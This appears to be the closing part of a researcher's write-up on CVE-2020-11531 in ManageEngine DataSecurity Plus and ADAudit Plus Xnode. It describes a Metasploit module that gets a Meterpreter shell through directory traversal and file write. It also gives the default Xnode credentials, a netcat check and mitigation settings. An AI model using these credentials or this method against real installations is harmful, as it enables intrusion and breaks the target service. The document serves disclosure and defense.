All you need to do to get a Meterpreter session out of this, is paste the printed command (this is actually very long, so I snipped it) into Command Prompt or an injection vector.

Since I could not think of an easy way to leverage this functionality from within another module, I fully gave in to the first instinct of any developer who’s in a pickle: steal code. That’s right, I simply began copying over code from web_delivery into my draft module until it seemed like it should work together with my own spaghetti. At first it didn’t work of course, it never does, but after scrutinizing ever relevant line in web_delivery to make sure I didn’t miss anything, I got my Frankenstein module to pop its first Meterpreter session via CVE-2020–11531.

In order to make my module reusable, there was one more issue to deal with. As mentioned above, the exploit will wipe the schema directory. As it turns out, Xnode doesn’t really appreciate having no data repository schema files to reference (who would’ve thought?). In fact, the exploit will break Xnode and even make it impossible to reboot DataSecurity Plus. To prevent this from happening in my module, I added a method that leverages the incoming shell (if we got one) to automatically repopulate the schema directory with the default JSON files. This should prevent nuking DataSecurity Plus when exploitation is successful, although it may still impact functionality in the case of a non-default Xnode configuration. But, you may ask, what if the module succeeds in sending a dr:/dr_schema_sync request, yet fails to ultimately get a shell? I don’t know kid, maybe send flowers to the sysadmin?

2.7 Web_delivery as a mixin?

I’m sure the Metasploit devs are going to hate my PR in its current form, with all the web_delivery stuff hardcoded in it, but I hope they will let me move some of the web_delivery code into a mixin so that it can be leveraged by multiple modules without resulting in duplicate code. In any case, the below video shows my hack job module laying waste to one of my test VMs.

2.8 Video || GTFO

2.9 A note on CVE-2020–11531 and ADAudit Plus

While the web server configuration for DataSecurity Plus instances vulnerable to CVE-2020–11531 allows JSP files, this is not true for ADAudit Plus. As a result, directory traversal and arbitrary file write via dr:/dr_schema_sync are still possible via ADAudit Plus, but actually getting a shell requires an alternative approach than the one pursued for DataSecurity Plus. I haven’t really looked into this, but you, dear reader, are more than welcome to have a go.

Mitigation

The most effective way to mitigate these issues is to update your Xnode instances to the latest versions using the available service packs for ADAudit Plus and DataSecurity Plus.

If patching is not feasible for your organization for whatever reason, you can make the following changes to the Xnode configuration file at

<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.con

as a workaround:

  • Change the Xnode credentials by editing the value for
xnode.connector.password = chegan

and (optional):

xnode.connector.username = atom
  • Disable remote processing for Xnode (later versions do this by default) by adding the following line:
xnode.connector.accept_remote_request = false

To verify that the patch or workaround was effective, use netcat or a similar tool to connect to Xnode and send an empty JSON hash ({}) like this:

# nc 192.168.1.6 29118
{}

The Xnode server should now respond with the following message:

{“response”:{“error_msg”:”Remote request-processing disabled!!”,”error_code”:1},”request_id”:-1}

Enabling remote processing for research

If you want to test my enumeration module against a free trial version of ADAudit Plus or DataSecurity Plus, you can manually enable remote processing by doing the opposite of step 2 of the workaround described above. So you would need to add the following line to your Xnode configuration file:

xnode.connector.accept_remote_request = true

You will not be able to change the password back to the default, because patched apps will generate a random password for Xnode each time it boots up. However, you can simply provide the correct password to the module, as shown in the demo video.

--

--